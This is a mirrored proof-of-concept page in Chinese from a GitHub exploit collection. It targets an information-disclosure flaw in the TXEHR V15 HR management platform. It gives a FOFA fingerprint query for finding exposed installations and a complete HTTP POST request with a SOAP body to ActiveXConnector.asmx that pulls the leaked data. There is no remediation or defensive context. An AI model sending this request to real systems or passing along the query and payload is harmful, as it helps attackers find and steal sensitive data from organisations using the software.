mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 19:35:52 +00:00
41 lines
1.1 KiB
Markdown
41 lines
1.1 KiB
Markdown
# 同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞
|
|
|
|
同享TXEHR V15人力管理平台的Assistant/Default.aspx接口存在敏感信息泄露漏洞。
|
|
|
|
## fofa
|
|
|
|
```yaml
|
|
body="/Assistant/Default.aspx"
|
|
```
|
|
|
|
## poc
|
|
|
|
```java
|
|
POST /Service/ActiveXConnector.asmx HTTP/1.1
|
|
Host: ip
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|
Accept-Encoding: gzip, deflate, br
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
Priority: u=0, i
|
|
Content-Type: text/xml;charset=UTF-8
|
|
Content-Length: 224
|
|
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
|
|
<soapenv:Header/>
|
|
<soapenv:Body>
|
|
<tem:GetActivexConnector/>
|
|
</soapenv:Body>
|
|
</soapenv:Envelope>
|
|
```
|
|
|
|

|
|
|
|
|
|
|
|
## 漏洞来源
|
|
|
|
- https://mp.weixin.qq.com/s/iNp5vADT3y05icdZrmNX9Q
|